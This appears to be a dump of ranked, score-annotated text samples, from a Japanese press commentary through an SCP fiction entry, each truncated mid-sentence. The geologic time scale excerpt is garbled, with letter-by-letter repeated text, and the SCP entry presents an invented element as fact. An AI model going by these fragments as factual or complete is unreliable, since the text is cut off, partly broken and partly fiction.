surroundings. This newly formed helium can eventually work its way to the atmosphere through cracks in the crust. + +Helium is commercially recovered from natural +================================================================================ +Rank = 70; Score = 1138688.0 +<|begin_of_text|>In the minds of the Japanese press and their readers, the United States government under the Obama administration dislikes - if it doesn't, it should and it must - the Japanese "right-wing" administration of Shinzo Abe, and it condemns - if it doesn't, it should and it must - the State Secrecy Protection Law that just passed the Upper house in Japan. + +So when the Japanese reporters write about the US reaction (if any) to the law, they try their best to elicit the response they want to hear; failing that, they still hear what they want to hear and write about what they believe they hear. In other words, they goalseek. + +First it was Mainichi Shinbun (12/7/2013) who reported on the US reaction to the passage of the State Secret Protection Law: + +ハーフ副報道官は「情報の保全は同盟国間の協力に決定的な役割を果たす」と述べ、日米両政府が共有する情報の保全が必要であるとの認識を示した。ただ、ハーフ氏は「表現の自由、報道の自由などの普遍的価値の共有が我々の同盟関係の基盤である」とも述べ、同法を根拠に言論の自由を制限することがないよう日本政府に求めた。 + +Deputy Spokesperson Harf said "Information security plays a critical role in alliance cooperation," indicating security of information shared by both the Japanese government and the US government is necessary. However, [Ms.] Harf also said, "A foundation of our alliance is a shared commitment to universal values such as freedom of expression and freedom of the press," by which remark she requested the Japanese government not to limit the freedom of speech based on the [State Secrecy Protection] Law. + +Thus, according to Mainichi, the US Obama administration has expressed concern that the Japanese government may restrict freedom of speech under the law. + +That's odd, I thought, coming from this US administration. + +Then, the Asahi Shinbun reporter whom I follow on Twitter tweeted about part of the US State Department Press Briefing on December 6, 2013, which concerned the State Secrecy Protection Law that passed the Opper House on December 6 (Japan Standard Time) and became the law of the land. He said: + +秘密保護法の制定は米政府が日本に長年求 +================================================================================ +Rank = 71; Score = 1122304.0 +<|begin_of_text|>RAW: http://ncode.syosetu.com/n0695bs/9/ + +9: sorry guys it took me more time than expected suddenly got work stuff to do and also I’ll be putting new stuff at the art page colored Ryua drinking a lemon soda with a straw, Roel’s first design by me, Poison Salamander + +Xant: I totally just realized that Ikana Village, Ryua’s hometown, shares the name of Ikana Canyon from Majora’s Mask. The land of the cursed, filled with lingering spirits and regret. Man I hope this is foreshadowing in a way. Would be pretty awesome. + +Chapter 8 – My First Dungeon Delving + +“Certainly this is the requested item that the client is seeking for. As I thought he died....... ” + +“Yes......” + +The quest Roel and I took today was enough to make us feel dejected. + +We were to search for a comrade of an Adventurer that failed escape here in this town but at the end what we found was a corpse that was cruelly eaten and scattered around. + +It looked like a marriage ring, and hearing the cries from the person’s family made my chest tighten. + +I understand how they feel, seeing their reaction to this. + +We can’t give up being adventurers. + +(TL:仲間の人達は薄々とわかっていたようで、あえてボク達に依頼したようだ。 + +諦めきれなかったのかもしれない。) + +“We received 300G as a reward, Ryua-chan.....” + +“Wasn’t it supposed to be 200G?” + +Along the way in our quest Roel leveled up by 1 but she wasn’t happy. + +Once we completed our quest, we checked our levels at the iron box. But like before my level didn’t show itself. + +Yesterday, I had tried asking Gantetsu about the one-winged demon when we were parting. + +“I have been doing this job for years but I haven’t heard anything about it. Regarding the attack on Ikana Village, the truth is we don’t completely understand what happened. Probably since it sort of happened in the blink of an eye.” + +*Scrtchscrtch* + +While scratching his beard, Gantetsu continued. + +“I don’t understand the nature of that one-winged guy. Is there some sort of reason why he has only one wing? I think knowing that would be relatively important.” + +I didn’t +================================================================================ +Rank = 72; Score = 1122304.0 +<|begin_of_text|>22nd March 2013 + +A step closer to affordable water desalination + +The defence contractor, Lockheed Martin, has reported a new method for desalination that is vastly cheaper and more efficient, using nanotechnology. + +Lockheed Martin has been awarded a patent for "Perforene" – a new molecular filtration system that is designed to meet the growing global demand for potable water. This material works by removing sodium, chlorine and other ions from seawater and other sources. + +Dr. Ray Johnson, senior vice president and chief technology officer: "Access to clean drinking water is going to become more critical as the global population continues to grow, and we believe that this simple and affordable solution will be a game-changer for the industry. Perforene... is just one example of Lockheed Martin's efforts to apply some of the advanced materials that we have developed for our core markets, including aircraft and spacecraft, to global environmental and economic challenges." + +According to a UN report last year, over 780 million people around the world do not have access to clean drinking water. Tom Notaro, Lockheed business manager for advanced materials: "One of the areas that we're very concerned about in terms of global security is the access to clean and affordable drinking water. As more and more countries become more developed... access to that water for their daily lives is becoming more and more critical." + +Perforene was developed by placing holes that are one nanometre or less in a membrane of graphene. These are small enough to trap ions while dramatically improving the flow-through of water molecules, reducing clogging and pressure. Being just one atom thick, graphene is both strong and durable, making it far more effective at sea water desalination at a fraction of the cost of traditional reverse osmosis systems. + +John Stetson, senior engineer: "It's 500 times thinner than the best filter on the market today and 1,000 times stronger. The energy that's required and the pressure that's required to filter salt is approximately 100 times less." + +In addition to desalination, the Perforene membrane can be tailored to other applications – including capturing minerals, through the selection of the size of hole placed in the material to filter or capture a specific size particle of interest. Lockheed Martin has also been developing processes that will allow the material to be produced at scale. The company is now seeking commercialisation partners. + +A desalination plant in Dubai, United Arab Emirates + +Comments »<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 73; Score = 1105920.0 +<|begin_of_text|>A powerful communications satellite was boosted into orbit Sunday by a United Launch Alliance Atlas 5 rocket that will provide broadband internet service to passenger jets and rural consumers across the United States and parts of Canada and Central America that do not have access to cable or fiber networks. + +Running 46 minutes late because of a last-second technical snag, the 1.6-million-pound Atlas 5, equipped with three strap-on solid-fuel boosters for extra power, roared to life at 2:13 p.m. EST (GMT-5) and quickly lifted off from launch complex 41 at the Cape Canaveral Air Force Station in Florida, arcing away to the east under a mostly clear sky. + +Rapidly accelerating as it consumed its liquid oxygen and kerosene propellants, the 194-foot-tall rocket put on a weekend show for area residents, beachgoers and tourists, leaving a long trail of exhaust in its wake as it climbed out of the dense lower atmosphere and disappeared from view. + +The Russian-built RD-180 engine powering the first stage chalked up an apparently flawless performance, handing off to the rocket’s Aerojet Rocketdyne RL10C Centaur second stage engine a little more than four-and-a-half minutes after launch. + +As planned, the hydrogen-fueled Centaur engine fired twice and 32 minutes after launch, the 14,914-pound relay station was released from the second stage into a so-called “supersynchronous” orbit with a low point of 127 miles and a high point of around 40,389 miles. + +EchoStar 19’s on-board propulsion system will be used to circularize the orbit at an altitude of 22,300 miles above the equator where spacecraft take 24 hours to complete one trip around the planet. In such geosynchronous orbits, satellites appear to hang stationary in the sky, allowing the use of fixed antennas on the ground. + +EchoStar operates a fleet of two dozen solely owned, leased and managed relay stations. EchoStar 19, built by Space Systems Loral, will be stationed over North America to provide high-speed broadband internet service from HughesNet, an EchoStar subsidiary that currently serves more than a million customers with two existing satellites -- EchoStar 17 and Spaceway 3. + +Along with providing service to rural areas not wired for broadband, EchoStar 19 also will provide 200 megabits-per-second access to passenger jets. + +An artist’s depiction of the EchoStar 19 broadband satellite in orbit. EchoStar + +“It +================================================================================ +Rank = 74; Score = 1105920.0 +<|begin_of_text|>The first geologic time scale was proposed in 1913 by the British geologist Arthur Holmes (1890 - 1965). This was soon after the discovery of radioactivity, and using it, Holmes estimated that the Earth was about 4 billion years old - this was much greater than previously believed. + +EON ERA PERIOD EPOCH PIVOTAL EVENTS + +P + +h + +a + +n + +e + +r + +o + +z + +o + +i + +c + +E + +o + +n + +"Visible Life" + +Organisms with skeletons or hard shells. + +540 mya through today. + +P + +h + +a + +n + +e + +r + +o + +z + +o + +i + +c + +E + +o + +n + +"Visible Life" + +Organisms with skeletons or hard shells. + +540 mya through today. + +P + +h + +a + +n + +e + +r + +o + +z + +o + +i + +c + +E + +o + +n + +"Visible Life" + +Organisms with skeletons or hard shells. + +540 mya through today. + +P + +h + +a + +n + +e + +r + +o + +z + +o + +i + +c + +E + +o + +n + +"Visible Life" + +Organisms with skeletons or hard shells. + +540 mya through today. Cenozoic Era + +"The Age of Mammals" + +65 mya through today Quaternary Period + +"The Age of Man" + +1.8 mya to today Holocene + +11,000 ya to today Human civilization + +Pleistocene + +The Last Ice Age + +1.8-.011 mya The first humans (Homo sapiens) evolve. Mammoths, mastodons, saber-toothed cats, giant ground sloths, and other Pleistocene megafauna. A mass extinction of large mammals and many birds happened about 10,000 years ago, probably caused by the end of the last ice age. + +Tertiary Period + +65 to 1.8 mya Neogene + +24-1.8 mya Pliocene + +5-1.8 mya First hominids (australopithecines). Modern forms of whales. Megalodon swam the seas + +Miocene + +24-5 mya More mammals, including the horses, dogs and bears. Modern birds. South American monkeys, apes in southern Europe, Ramapithecus. + +Paleogene + +65-24 mya Oligocene + +38-24 mya Starts with a minor extinction (36 my +================================================================================ +Rank = 75; Score = 1105920.0 +<|begin_of_text|>Question: What five-note tune might get you a cheerful two-note response if you hum it in the US, but might get you a punch in the nose if you hum it in Mexico? + +Forfeit: Part of the national anthem, La Cucaracha, other traditional American or Mexican songs a Briton might know. + +Answer: "Shave and a Haircut." ( + +Notes: In America (and I think in the UK, too?), the tune can end a song, or you could knock on a door to its rhythm. It was common in old cartoons and was a plot point in the movie "Who Framed Roger Rabbit?" where the cartoon rabbit couldn't stay hidden since all someone had to do was hum "shave and a haircut" to make him respond "two bits." + +The traditional American lyrics are "Shave and a haircut, two bits." As was said in Series E, "two bits" used to mean 25 cents because the Spanish dollar coin, which was used in America about 200 years ago, was cut into 1/8th slices called "bits." Contrary to what was said in Series E, it's not really used to mean a quarter anymore, and the term persists only in the "Shave and a Haircut" lyrics and as an insulting adjective that simply means "inferior." + +In Mexico, however, the lyrics are a lot stronger: "Chinga (a) tu madre, cabron!" (The "a" is slurred with "chinga" so that you don't really hear it.) The translation is roughly, "Go f--k your mother, a--hole!" Most Americans have no clue about the Mexican version, and vice-versa, which could lead to quite an interesting misunderstanding. In Mexico, you can honk your horn to the five-note rhythm instead of using your middle finger. And if you knocked it on a door, it would be like saying, "Open the door, a--hole!" The origin is unclear, but the lyrics are known widely enough to offend. + +Production notes: If nobody gets it, Fry could tap the first five notes on the table to see if anyone taps the next two. Then he could ask if they know the lyrics. + +Sources: + +Wikipedia: Shave and a Haircut + +Wikipedia: Spanish milled dollar + +Translated Spanish explanation What five-note tune might get you a cheerful two-note response if you hum it in the US, but might get you a punch in the nose if you hum +================================================================================ +Rank = 76; Score = 1097728.0 +<|begin_of_text|>This article is about a kind of wig worn by Korean women. For the cake, see Guernsey Gâche + +The gache (Hangul: 가체; Hanja: 加髢) is a big wig worn by Korean women. Women of high social backgrounds and kisaeng wore them. Like their western contemporaries Koreans considered bigger and heavier wigs to be more aesthetically pleasing.[1] However, there is a record of an incident where a heavy gache wig led to the death of a 13-year-old bride as the heavy wig compromised her neck as she was getting up to greet her father-in-law entering the room. Also due to its costliness, some lower-class families took up to 6–7 years preparing a new gache wig for their new daughter-in-law.[2] + +The gache also flourished in Goryeo, the Three Kingdoms, Balhae, the Gaya confederacy, and Gojoseon. They were decorated with silk objects, gold, jewels, silver, coral, jade, etc. Certain decorations were reserved for royalty. + +Such was the women's frenzy for the gache that in 1788, King Jeongjo of Joseon prohibited and banned by royal decree the use of gache as they were deemed contrary to Confucian values of reserve and restraint.[3] In the 19th century, yangban women began to wear jokduri, a small hat that substituted for the gache. However gache still enjoyed vast popularity in kisaeng circles and traditional weddings. Inclusive of its decorations, a gache usually weighs about 3 to 4 kg. + +Gallery [ edit ] + +See also [ edit ]<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 77; Score = 1089536.0 +<|begin_of_text|>José Mourinho has admitted Chelsea are 'a club missing a striker' but while he ruled out the possibility of signing Zlatan Ibrahimovic in the summer, he did drop a hint that his club could be interested in another forward currently playing in France, Radamel Falcao. + +Mourinho said that persuading Paris St Germain to part with Ibrahimovic was "mission impossible", but admitted that Falcao was a player he is interested in, suggesting the Colombian forward's current club Monaco, now managed by Mourinho's Chelsea predecessor Claudio Ranieri, are not big enough for a player of his stature. + +After his stellar scoring form at Atlético Madrid and previously at Mourinho's former club Porto, Falcao was one of Europe's hottest properties last summer, but the 28-year-old surprisingly opted to join Monaco in a £50m deal. + +"The problem at Chelsea is that we are missing a striker. I have one in [Samuel] Eto'o but he is 32, possibly 35, who knows?", Mourinho joked in an interview with the French television station Canal Plus, before adding. "I don't have Falcao but Falcao doesn't have a club. Who wants to play in front of 3,000 supporters? If I was one day to go to Monaco it would be the end." + +Falcao is currently out of action due to a serious knee injury but should recover in time to play for Colombia at the World Cup finals in Brazil. + +When asked about the possibility of Chelsea moving for the Swede Ibrahimovic, Mourinho said: "It's impossible. He is happy in Paris, I know because we are friends and we have some contact. PSG, with their economic potential, would never want to open the door. It's mission impossible." + +Mourinho also rejected suggestions that Eden Hazard could be tempted to swap London for Paris and join PSG. "Eden is our boy," he added. "We want him to stay for 10 years. We want to build the team around him. He's a player with the style of football that we want to have in our team."<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 78; Score = 1073152.0 +<|begin_of_text|>In thermodynamics, the triple point of a substance is the temperature and pressure at which the three phases (gas, liquid, and solid) of that substance coexist in thermodynamic equilibrium.[1] It is that temperature and pressure at which the sublimation curve, fusion curve and the vaporisation curve meet. For example, the triple point of mercury occurs at a temperature of −38.83440 °C and a pressure of 0.2 mPa. + +In addition to the triple point for solid, liquid, and gas phases, a triple point may involve more than one solid phase, for substances with multiple polymorphs. Helium-4 is a special case that presents a triple point involving two different fluid phases (lambda point).[1] + +The triple point of water was used to define the kelvin, the base unit of thermodynamic temperature in the International System of Units (SI).[2] The value of the triple point of water was fixed by definition, rather than measured, but that changed with the 2019 redefinition of SI base units. The triple points of several substances are used to define points in the ITS-90 international temperature scale, ranging from the triple point of hydrogen (13.8033 K) to the triple point of water (273.16 K, 0.01 °C, or 32.018 °F). + +The term "triple point" was coined in 1873 by James Thomson, brother of Lord Kelvin.[3] + +Triple point of water [ edit ] + +Gas–liquid–solid triple point [ edit ] + +A typical phase diagram. The solid green line applies to most substances; the dashed green line gives the anomalous behavior of water + +The single combination of pressure and temperature at which liquid water, solid ice, and water vapor can coexist in a stable equilibrium occurs at exactly 273.1600 K (0.0100 °C; 32.0180 °F) and a partial vapor pressure of 611.657 pascals (6.11657 mbar; 0.00603659 atm).[4][5] At that point, it is possible to change all of the substance to ice, water, or vapor by making arbitrarily small changes in pressure and temperature. Even if the total pressure of a system is well above the triple point of water, provided that the partial pressure of the water vapor is 611.657 pascals, then the system can still be brought to the triple point of water. Strictly speaking, the surfaces +================================================================================ +Rank = 79; Score = 1073152.0 +<|begin_of_text|>After a video emerged appearing to show Hillary Clinton struggling to stand upright before stumbling into a car at a 9/11 memorial ceremony in New York City Sunday, the presidential candidate was forced to go public with the pneumonia diagnosis she received two days before. + +But the near-fainting spell was in fact due to dehydration, exacerbated by her condition. Her husband Bill Clinton said Monday that it wasn’t the first time. “Rarely, but on more than one occasion, over the last many, many years, the same sort of thing’s happened to her where she just got severely dehydrated,” he said. + +Politico reports, citing unnamed sources, that Clinton is chronically dehydrated, and that her reluctance to regularly drink water has become a “source of tension” between the candidate and her staff. “She won’t drink water, and you try telling Hillary Clinton she has to drink water,” a source in close contact with the Democratic candidate said. Politico described a hectic rehydration mission which included lots of bottles of water as well as Gatorade. + +In 2013, CBS reported that some 75% of Americans may be functioning in a chronic state of dehydration, many mistaking the symptoms for other illnesses. Whether she’s among them or not, the Democratic nominee might be better off taking a big gulp next time a staff member approaches with a glass of water. Here’s everything you need to know about dehydration: + +The Brief Newsletter Sign up to receive the top stories you need to know right now. View Sample Sign Up Now + +Why do we get dehydrated? + +Dehydration occurs when your body loses more fluid than you take in, upsetting its balance of salts and sugar, which affects the way it functions. Water makes up between 60-70% of average adult— and it’s important to keep levels stable. Water is essential for life and our body uses it in many different ways, from lubricating joints and regulating our temperature to enabling waste removal via sweating, bowel movements and urination. + +If not treated immediately, chronic – or ongoing – dehydration can lead to serious medical complications; it can affect your kidney function, increase the risk of kidney stones and lead to muscle damage and constipation. This level of dehydration requires hospital treatment where a sufferer will be attached to a drip to restore fluids. Of patients treated for kidney stones, 50% are likely to have a recurrence within ten years. + +How do we get dehydrated? + +Usually, by not drinking enough fluid – usually water – to replace what you lose. +================================================================================ +Rank = 80; Score = 1048576.0 +<|begin_of_text|>× Hubble captures triple solar eclipse on Jupiter + +(CNN) — The Hubble space telescope peers hundreds, thousands, millions of light years into the universe to study novas, quasars and nebulas. + +But weeks ago, it pulled its focus way in close — to just light minutes away — to view a rare and beautiful spectacle at the planet Jupiter. + +Three big moons crossed past it at the same time, casting their shadows onto Jupiter’s swirling surface. + +From the perspective of people theoretically standing down on Jupiter, it would be like three solar eclipses happening at once, astronomers said. + +A photo gift + +In the last 15 years, this has happened only twice, the Space Telescope Science Institute said. “The next one will be 2032,” said astronomer Carol Christian. + +So, Hubble shot photos rapid fire to capture the rare conjunction in late January. And STScI published them on Thursday, along with a short fast-motion video animation. + +There was no great scientific gain in Hubble taking the snaps. The moons and their crossings have been examined plenty and are well known. + +“We felt that there are images which have aesthetic value above and beyond their scientific value,” said astronomer Zolt Levy. + +It was a gift of beauty to the public. + +62 moons, 4 big ones + +Jupiter is a sort of mini-solar system inside our solar system. + +It’s the largest body after the sun. And like the sun, it comprises a lot of helium and hydrogen gas, but it doesn’t have enough mass to burst into the intense nuclear fusion that makes the sun a fireball, NASA says. + +It has many satellites, including 62 moons, and they swarm around the planet with many of them crossing the surface facing Earth constantly. + +But only four of them are highly visible standouts. They are Io, Europa, Ganymede and Callisto. + +Just like Galileo + +The four moons are called the Galilean satellites, because Renaissance astronomer Galileo Galilei discovered them in 1610, when he pointed his telescope skyward, forever changing human perception of our place in the cosmos. + +Many of today’s hobby telescopes are much stronger than his, so anyone can easily follow in his footsteps and cast the same gaze. + +And many did, when the three moons passed, posting their recordings of the triple moon transit on YouTube. + +The moons spin around Jupiter at different speeds; their orbits vary in duration from two to 17 days, so having them line up together to zip across the side of +================================================================================ +Rank = 81; Score = 1044480.0 +<|begin_of_text|>Ammonia and organic compounds in icy plumes on one of Saturn's moons provide strong evidence for the existence of liquid water beneath the surface + +The idea that liquid water exists below the surface of one of Saturn’s moons has been given a boost thanks to researchers in the US and China who have detected ammonia, various organic compounds, and possibly argon in plumes of gas and ice particles that spew out of the moon’s south pole. + +The work should help scientists further understand the formation of this and other planetary bodies and keeps hope alive that Enceladus, Saturn’s sixth largest moon, might have the necessary components to support extraterrestrial life. + +When plumes of ice water were first observed erupting from Enceladus by NASA’s Cassini spacecraft in 2005, scientists immediately began to wonder if they were being propelled by liquid water present in the moon’s interior. Now, Jack Hunter Waite Jr and colleagues from the Southwest Research Institute in San Antonio, US, and a number of other institutions in the US and Taiwan have added to mounting evidence in support of this theory by analysing INMS (ion neutral mass spectrometer) data on the plumes’ gas constituents obtained from a recent Cassini flyby. + +’Our evidence [for liquid water] comes from the detection of ammonia which acts as an antifreeze and can lower the melting point of water ice,’ explains Jonathan Lunine, one of the paper’s co-authors and a planetary scientist at the University of Arizona in Tucson, US. + +Moreover, the team believe their analysis points to an abundance of an isotope of argon (40Ar) in the plumes. The most plausible explanation for its presence, they say, is that a fluid must be leaching either the 40Ar or its parent potassium out of the rock deep inside Enceladus’ interior. ’Ice doesn’t do that so it really should be liquid,’ adds Lunine. + +Growing support + +Last month, German scientists, led by Frank Postberg from the University of Heidelberg, put forward strong evidence for subsurface liquid water by publishing their discovery of sodium salts in Saturn’s outer-most ring which is thought to originate from Enceladus’ plume material. ’The two studies are complimentary and now, for the first time, we are getting an idea of the full picture of what’s happening on Enceladus,’ says Postberg. + +Also excited about the new findings is Dave Stegman from the University of Melbourne in Australia, who has previously hypothes +================================================================================ +Rank = 82; Score = 1036288.0 +<|begin_of_text|>Mars scientists today nominated eight enticing targets for NASA’s next rover, due for launch in 2020. More than 100 planetary scientists narrowed down a list of 21 sites with a vote at the conclusion of a 3-day workshop in Monrovia, California. The researchers were keen to find sites that could preserve signs of life in rocks which would be sampled by the rover and, they hope, eventually returned to Earth. + +The top vote getter was Jezero crater, which contains a relic river delta that could have concentrated and preserved organic molecules. “The appeal is twofold,” says Bethany Ehlmann, a planetary scientist at the California Institute of Technology (Caltech) in Pasadena. “Not only is there a delta, but the rocks upstream are varied and diverse.” + +Second on the list was Columbia Hills, a region explored by the rover Spirit before it expired in 2010. Spirit found silica deposits that may have been deposited by a hydrothermal system—one that could have nourished life billions of years ago. + +Several other favored sites sit at the edge of Isidis Basin, an impact structure that created deep troughs with significant carbonate deposits, which could help explain how Mars lost its once-thick carbon dioxide atmosphere. That atmosphere “was either lost to space, or it has to be sequestered down in the rock as carbonates,” Ehlmann says. “We can explore one of those paths.” + +The new $1.5 billion rover will be very similar to Curiosity, which has been exploring Gale crater since 2012. But there are key differences. The main one is that the 2020 rover is expected to drill and collect more than 30 pencil-sized rock cores to be stored in a sample “cache.” Later missions could then land a small rover that would fetch and deliver the cache to a rocket that would return the samples to Earth for analysis. + +The 2020 rover also has a slimmed down payload compared to Curiosity. It won’t have, for instance, a mass spectrometer analysis instrument of the type that has at times bogged down Curiosity. That should enable mission scientists to assemble a cache more quickly. The “sky crane” system, which delivered Curiosity to the surface, will also be used again, though engineers are considering enhancements that could allow zones of confident targeting to shrink by more than 50%, to ellipses as small as 13 kilometers by 7 kilometers. + +A new sample collection plan + +In recent months, mission planners have also shifted to +================================================================================ +Rank = 83; Score = 1036288.0 +<|begin_of_text|>Wood gas is a syngas fuel which can be used as a fuel for furnaces, stoves and vehicles in place of gasoline, diesel or other fuels. During the production process biomass or other carbon-containing materials are gasified within the oxygen-limited environment of a wood gas generator to produce hydrogen and carbon monoxide. These gases can then be burnt as a fuel within an oxygen rich environment to produce carbon dioxide, water and heat. In some gasifiers this process is preceded by pyrolysis, where the biomass or coal is first converted to char, releasing methane and tar rich in polycyclic aromatic hydrocarbons. + +History [ edit ] + +A bus, powered by wood gas generated by a gassifier on a trailer, Leeds, England c.1943 + +The first wood gasifier was apparently built by Gustav Bischof in 1839. The first vehicle powered by wood gas was built by Thomas Hugh Parker in 1901.[1] Around 1900, many cities delivered syngas (centrally produced, typically from coal) to residences. Natural gas began to be used only in 1930. + +Wood gas vehicles were used during World War II as a consequence of the rationing of fossil fuels. In Germany alone, around 500,000 "producer gas" vehicles were in use at the end of the war. Trucks, buses, tractors, motorcycles, ships and trains were equipped with a wood gasification unit. In 1942, when wood gas had not yet reached the height of its popularity, there were about 73,000 wood gas vehicles in Sweden,[2] 65,000 in France, 10,000 in Denmark, and almost 8,000 in Switzerland. In 1944, Finland had 43,000 "woodmobiles", of which 30,000 were buses and trucks, 7,000 private vehicles, 4,000 tractors and 600 boats.[3] + +Wood gasifiers are still manufactured in China and Russia for automobiles and as power generators for industrial applications. Trucks retrofitted with wood gasifiers are used in North Korea[4] in rural areas, particularly on the roads of the east coast. + +Usage [ edit ] + +Internal combustion engine [ edit ] + +Wood gasifier system + +A wood-gas powered car, Berlin, 1946. Note the secondary radiator, required to cool the gas before it's introduced into the engine + +Wood gasifiers can power either spark ignition engines, where all of the normal fuel can +================================================================================ +Rank = 84; Score = 1028096.0 +<|begin_of_text|>Aligned carbon nanotube/graphene sandwiches for high-rate lithium-sulfur batteries + +(Nanowerk Spotlight) Sp 2 -bonded carbon nanomaterials – such as carbon nanotubes (CNTs) and graphene – have attracted enormous research interest over the past decades. Due to their superior intrinsic physical properties, such as mechanical strength, electrical and thermal conductivity, these nanocarbons find numerous applications in areas such as catalysis, energy storage or nanocomposites. In addition to these intrinsic physical properties, what makes these materials so attractive are their tunable chemical characters, such as functional groups, doping, and surface modification. + +However, the demonstration of their intrinsic physical properties and performances in as-fabricated materials and practical devices has been suffering from the self-aggregation and re-stacking of nanocarbon materials due to strong van der Waals interactions. This prevents the full utilization of the active sites for catalytic reactions. + +Researchers consider the rational combination of CNTs and graphene into three-dimensional (3D) hybrids an effective route to amplify the inherent physical properties at the macroscale. From post-treatment methods to in situ growth, various strategies have been explored to fabricate such CNTs/graphene hybrids. Most of these approaches, though, still require barrier layers, which hinders the full demonstration of the excellent properties of these hybrid materials. + +By in situ nitrogen doping and structural hybridization of carbon nanotubes and graphene, a team from Tsinghua University, led by professors Qiang Zhang and Fei Wei, have now successfully fabricated nitrogen-doped aligned carbon nanotube/graphene (N-ACNT/G) sandwiches. In this work, aligned CNTs and graphene layers were anchored to each other, constructing a sandwich-like hierarchical architecture with efficient 3D electron transfer pathways and ion diffusion channels. + +The researchers have published their findings in Advanced Materials ("Nitrogen-Doped Aligned Carbon Nanotube/Graphene Sandwiches: Facile Catalytic Growth on Bifunctional Natural Catalysts and Their Applications as Scaffolds for High-Rate Lithium-Sulfur Batteries"). + +Conceptual scheme of the design of N-ACNT/G hybrids with graphene and aligned CNTs as building blocks. (a) Structural hybridization of aligned CNTs and graphene via catalytic growth on bifunctional natural catalysts; (b) In situ nitrogen doping for moderate chemical modification of the carbon scaffolds. (Reprinted with permission by Wiley-VCH Verlag) + +"We used lamellar +================================================================================ +Rank = 85; Score = 1019904.0 +<|begin_of_text|>Despite being odorless and invisible to the naked eye, the presence of SCP-XXXX-1 can be perceived by the human host in a variety of other ways. Symptoms of SCP-XXXX-1 infection include but are not limited to: + +High-concentrations of SCP-XXXX which manifest behind human hosts are collectively designated as SCP-XXXX-1. Only one instance of SCP-XXXX-1 has been observed to gestate on a human host at any given time. By consequence, instances of SCP-XXXX-1 behave as individual entities and interact and respond independently of other instances of SCP-XXXX-1. Individuals which act as a host to an SCP-XXXX-1 instance are said to have been 'infected' by an instance of SCP-XXXX-1. SCP-XXXX-1 are nebulous entities which can condense and expand to accommodate for the space behind a human host. + +SCP-XXXX has a melting point of 0.56K and a boiling point of 3.09K at STP. SCP-XXXX is an odorless gas that cannot be perceived by the naked eye at any concentration or volume, however; SCP-XXXX is an opaque, black substance in both its solid and liquid form. SCP-XXXX has not been observed to perform chemical bonding with itself or any other elements. Despite this, SCP-XXXX naturally congregates around the backs of human subjects. + +Description: SCP-XXXX is the designation given to element-12█ of the periodic table. Unlike any elements which precede it, SCP-XXXX is extremely stable - with no apparent half-life or any known 